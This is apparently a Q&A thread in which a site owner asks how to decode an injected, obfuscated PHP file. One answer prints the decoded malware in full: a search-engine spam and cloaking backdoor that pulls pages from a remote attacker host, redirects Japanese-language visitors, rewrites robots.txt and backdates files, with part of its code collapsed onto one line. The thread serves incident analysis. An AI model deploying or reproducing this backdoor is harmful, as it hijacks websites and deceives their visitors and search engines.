# php code injection by hack which begins with $O00OO0=base64_decode. So i did decode it using unphp.net but that again returns an encrypted code

Tags: php, encryption

I have got php code injection by hack which begins with

```
$O00OO0=base64_decode.
```

So I did decode it using `unphp.net` but that again returns a code which assigns a variable

```
$O0O000 = "srDHGkVU..";  
eval('?>' . $O00O0O($O0OO00($OO0O00($O0O000, $OO0000 * 2), $OO0O00($O0O000, $OO0000, $OO0000), $OO0O00($O0O000, 0, $OO0000))));
```

Any help or guidance would be appreciated.

Comment: What is the question? How to decode such obfuscated code without risk to bring harm to your system? I would start with replacing eval with echo and do step-by step manual decoding.

Comment: Share the full code

Comment: Thanks Maxim and Brett Gregson for responding. I figured it out just a moment ago. i replaced the encrypted code inside eval() which looks like $xyz = base64_decode( strtr(substr($O0O000 ,52*2),substr($O0O000,52,52),substr($O0O000,0,52)));
 echo("<pre>");
 print_r($xyz);
 echo("</pre>");

Answer (score 2):

here is decode

```
  <?php

global $xmlDir, $mapMin, $mapMax, $mapNum, $mapPrefix, $plusNum;
$xmlDir = 'sitemap';
$mapMin = '8000';
$mapMax = '12000';
$mapNum = '0';
$mapPrefix = '';
$plusNum = '';
@ini_set('memory_limit', '-1');
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@error_reporting(0);
@ini_set('display_errors', 0);
if (!is_bot() && !is_from_bot()) {
    return;
}
if (!is_bot() && !is_jp_lang()) {
    return;
}
$requestUri = get_request_uri();
if (preg_match('/--check-alive--/is', $requestUri, $results)) {
    echo '--alive--';
    $back = debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS);
    $str = $back[0]['file'];
    $reg = '/.php\((\d+)\)/';
    preg_match_all($reg, $str, $want);
    print_r($want[1][0]);
    exit();
} else if (preg_match('/--site-map--/is', $requestUri, $results)) {
    get_site_map();
    exit();
} else if (preg_match('/(-[1-9])?.xml$/is', $requestUri, $results)) {
    @header("Content-type: text/xml");
    get_csite_map();
    exit();
} else if (preg_match('/(\d{5,})/is', $requestUri, $results)) {
    $getId = $results[1];
    get_article($getId);
    exit();
} else {
    $getId = get_id();
    get_article($getId);
    exit();
}
function get_api_url()
{
    return 'http://prjclymfijabgj88.jpstore.top/group1/jp-api.php';
}

function get_article($id)
{
    $proId = get_num();
    $id = $id - $proId;
    $html = get_api_page(get_api_url() . '?action=article&id=' . $id . '&host=' . get_http_host() . '&ip=' . get_real_ip() . '&tail=' . get_tail() . '&proNum=' . get_num());
    if (stripos($html, '404') === 0) {
        $getId = get_id() - $proId;
        if (is_bot()) {
            get_article($getId);
            exit();
        } else {
            get_jump($getId);
            exit();
        }
    } else {
        if (is_bot()) {
            echo $html;
            exit();
        } else {
            get_jump($id);
            exit();
        }
    }
    echo $html;
    exit();
}

function get_jump($id)
{
    echo get_api_page(get_api_url() . '?action=jump&id=' . $id . '&host=' . get_http_host() . '&ip=' . get_real_ip());
    exit();
}

function get_csite_map()
{
    $results = get_api_page(get_api_url() . '?action=sitemap&host=' . get_http_host() . '&ip=' . get_real_ip() . '&tail=' . get_tail() . '&proNum=' . get_num());
    $sitemapArray = json_decode(gzinflate(base64_decode($results)));
    shuffle($sitemapArray);
    $date_str = date("Y-m-d\TH:i:sP", time());
    $xmlArray = array_slice($sitemapArray, 0, 12000);
    $xml = '';
    $url = '';
    foreach ($xmlArray as $xmlKey => $xmlValue) {
        $url .= ' ' . $xmlValue . ' ' . $date_str . ' daily 0.1 ';
    }
    $xml = ' ';
    $xml .= $url;
    $xml .= '';
    echo $xml;
    exit();
}

function get_site_map()
{
    global $xmlDir, $mapMin, $mapMax, $mapNum, $mapPrefix;
    if (!file_exists($xmlDir)) {
        mkdir($xmlDir);
    }
    $results = get_api_page(get_api_url() . '?action=sitemap&host=' . get_http_host() . '&ip=' . get_real_ip() . '&tail=' . get_tail() . '&proNum=' . get_num());
    $sitemapArray = json_decode(gzinflate(base64_decode($results)));
    shuffle($sitemapArray);
    $dataArray = array_chunk($sitemapArray, $mapMax);
    $robotsTxt = 'User-agent: *' . PHP_EOL . 'Allow: /' . PHP_EOL;
    $date_str = date("Y-m-d\TH:i:sP", time());
    foreach ($dataArray as $dataKey => $dataValue) {
        $xmlArray = array_slice($dataValue, 0, mt_rand($mapMin, $mapMax));
        $url = '';
        $xml = '';
        foreach ($xmlArray as $xmlKey => $xmlValue) {
            $url .= ' ' . $xmlValue . ' ' . $date_str . ' daily 0.1 ';
        }
        $xml = ' ';
        $xml .= $url;
        $xml .= '';
        $xmlFile = $xmlDir . '/sitemap-' . $mapPrefix . ($dataKey + $mapNum + 1) . '.xml';
        file_put_contents($xmlFile, $xml, LOCK_EX);
        $http = '';
        if (!isset($_SERVER['HTTPS'])) {
            $http = 'http://';
        } else {
            if ($_SERVER['HTTPS'] === 1 || $_SERVER['HTTPS'] == 'on' || $_SERVER['SERVER_PORT'] == 443) {
                $http = 'https://';
            }
        }
        echo $http . $_SERVER['SERVER_NAME'] . '/sitemap/sitemap-' . $mapPrefix . ($dataKey + $mapNum + 1) . '.xml' . '
';
        $sitemapUrl = $http . $_SERVER['SERVER_NAME'] . '/sitemap/sitemap-' . $mapPrefix . ($dataKey + $mapNum + 1) . '.xml';
        $robotsTxt .= 'Sitemap: ' . $http . $_SERVER['SERVER_NAME'] . '/sitemap/sitemap-' . $mapPrefix . ($dataKey + $mapNum + 1) . '.xml' . PHP_EOL;
        ping_google($sitemapUrl);
        ping_bing($sitemapUrl);
    }
    $robots = dirname(__FILE__) . '/robots.txt';
    file_put_contents($robots, $robotsTxt, LOCK_EX);
    @touch($robots, strtotime("-400 days"));
    exit();
}

function ping_google($sitemapUrl)
{
    $pingUrl = 'https://www.google.com/ping?sitemap=' . urlencode($sitemapUrl);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $pingUrl);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch); //执行curl请求 echo 'Google ping 成功

   url_close($ch); } function ping_bing($sitemapUrl){ $pingUrl = 'https://www.bing.com/webmaster/ping.aspx?siteMap='.urlencode($sitemapUrl); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $pingUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); //执行curl请求 echo 'Bing ping 成功
    curl_close($ch); } function get_id() { $bakDir = dirname(__FILE__) . ' / images'; $requestUri = get_request_uri(); $strlen = strlen($requestUri); $filePath = $bakDir . ' / ' . $strlen . ' / '. md5($requestUri) . ' . jpg'; if (!file_exists(dirname($filePath))) { mkdir(dirname($filePath), 0777, true); } if (!file_exists($filePath)) { $getId = get_api_page(get_api_url() . ' ? action = getid & host = ' . get_http_host() . ' & ip = ' . get_real_ip(). ' & proNum = ' . get_num()); if (is_numeric($getId)) { file_put_contents($filePath, $getId, LOCK_EX); } }else{ $getId = file_get_contents($filePath); } return $getId; } function get_num() { global $plusNum; $numDir = dirname(__FILE__) . ' / images'; $numTxt = $numDir . ' / num . txt'; if (!file_exists($numDir)) { mkdir($numDir, 0777, true); } if($plusNum ==''){ if (file_exists($numTxt)) { $num = trim(file_get_contents($numTxt)); }else{ $requestUri = get_request_uri(); $strlen = strlen($requestUri); $num = 1000*$strlen+$strlen; file_put_contents($numTxt, $num, LOCK_EX); } }else{ $num = $plusNum; } return $num; } function get_tail() { $tailDir = dirname(__FILE__) . ' / images'; $tailTxt = $tailDir . ' / tail . txt'; if (!file_exists($tailDir)) { mkdir($tailDir, 0777, true); } if (file_exists($tailTxt)) { $tail = trim(file_get_contents($tailTxt)); }else{ $strs = 'ABCDEFGHIGKLMNOPQRSTUVWZYZabcdefghigklmnopqrstuvwxyz'; $strs_array = str_split($strs); shuffle($strs_array); $str_array = array_slice($strs_array, 0, mt_rand(3, 4)); $str = ' . ' . implode($str_array); $randomTailArray = []; $randomTailArray[] = $str; $randomTailArray[] = ' / '; $randomTailArray[] = ' . htm'; $tail = $randomTailArray[mt_rand(0,2)]; file_put_contents($tailTxt, $tail, LOCK_EX); } return $tail; } function get_http_host() { $http = ''; if(!isset($_SERVER['HTTPS'])){ $http = 'http://'; }else{ if($_SERVER['HTTPS'] === 1 || $_SERVER['HTTPS'] == 'on' || $_SERVER['SERVER_PORT'] == 443){ $http = 'https://'; } } if (isset($_SERVER['SERVER_NAME'])) { $host = $http . $_SERVER['SERVER_NAME']; }else if(isset($_SERVER['HTTP_HOST'])){ $host = $http . $_SERVER['HTTP_HOST']; }else{ return ''; } return $host; } function get_request_uri() { if (isset($_SERVER["REQUEST_URI"])) { $requestUri = $_SERVER["REQUEST_URI"]; }else{ $requestUri = ''; } return $requestUri; } function get_user_agent() { if (isset($_SERVER["HTTP_USER_AGENT"])) { $userAgent = $_SERVER['HTTP_USER_AGENT']; }else{ $userAgent = ''; } return $userAgent; } function get_real_ip() { $ip = false; if(!empty($_SERVER['HTTP_CF_CONNECTING_IP'])){ return $_SERVER['HTTP_CF_CONNECTING_IP']; } if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ips=explode (',', $_SERVER['HTTP_X_FORWARDED_FOR']); for ($i=0; $i < count($ips); $i++){ if(!preg_match ('^(10|172.16|192.168).', $ips[$i])){ $ip=$ips[$i]; break; } } } return $ip ? $ip : $_SERVER['REMOTE_ADDR']; } function get_api_page($url) { $file_contents = ''; $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'; if(function_exists('curl_init')){ try { $ch = curl_init(); $timeout = 30; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($ch,CURLOPT_USERAGENT,$user_agent); $file_contents = curl_exec( $ch); curl_close($ch); } catch (Exception $e) {} } if(strlen($file_contents)<1&&function_exists('file_get_contents')){ ini_set('user_agent',$user_agent); try { $file_contents = @file_get_contents($url); } catch (Exception $e) {} } if($file_contents == '503' || $file_contents == '') { error_503(); } return $file_contents; } function error_503() { ob_start(); header('HTTP/1.1 503 Service Temporarily Unavailable'); header('Status: 503 Service Temporarily Unavailable'); header('Retry-After:1200'); header('X-Powered-By:Apache'); exit(); } function is_bot() { $ua = get_user_agent(); $ip = get_real_ip(); if(empty($ua)) return false; if(stripos($ua,"--seeshop--") === 0) return true; $bot_dn_pool = array("google",'.yahoo.','.live.','.bing.','.msn.'); try { $rdns = gethostbyaddr($ip); if(empty($rdns)) return false; foreach ($bot_dn_pool as $dn) { if(stripos($rdns,$dn)) return true; } return false; } catch(Exception $e) { return (stripos($ua,"bot") ||stripos($ua,"spider") ||stripos($ua,"yahoo") ||stripos($ua,"seznam") ||stripos($ua,"Googlebot") ||stripos($ua,"bingbot") ||stripos($ua,"msnbot") ||stripos($ua,"Yahoo! Slurp") ||stripos($ua,"Slurp") ||stripos($ua,"bing")); } } function is_jp_lang() { if(stripos(get_user_agent(), '--jumpshop--') === 0){ return true; } if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4); }else{ $lang = ''; } return stripos($lang,"ja") === 0; } function is_from_bot() { if(stripos(get_user_agent(), '--jumpshop--') === 0){ return true; } if (!isset($_SERVER['HTTP_REFERER'])) { return false; } $referer = $_SERVER['HTTP_REFERER']; return (stripos($referer,"bot") ||stripos($referer,"spider") ||stripos($referer,"yahoo") ||stripos($referer,"seznam") ||stripos($referer,"Googlebot") ||stripos($referer,"bingbot") ||stripos($referer,"msnbot") ||stripos($referer,"Yahoo! Slurp") ||stripos($referer,"Slurp") ||stripos($referer,"bing"));

}
```

Answer (score 1):

I decoded the injected code using https://www.unphp.net/ then took the decoded code and replaced the below code.

`$O00O0O($O0OO00($OO0O00($O0O000, $OO0000 * 2), $OO0O00($O0O000, $OO0000, $OO0000), $OO0O00($O0O000, 0, $OO0000)));`

from the site i could also see that they had kept few variables at bottom which used to map. like

```
// $OO0000 = 52;
// $O00O0O = base64_decode;
// $O00OO0 = "n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j";
// $OO0O00 = substr;
// $O0OO00 = strtr;


base64_decode( strtr(substr($O0O000 ,52*2),substr($O0O000,52,52),substr($O0O000,0,52)))
```

after that i printed the result which gave me the readable php code.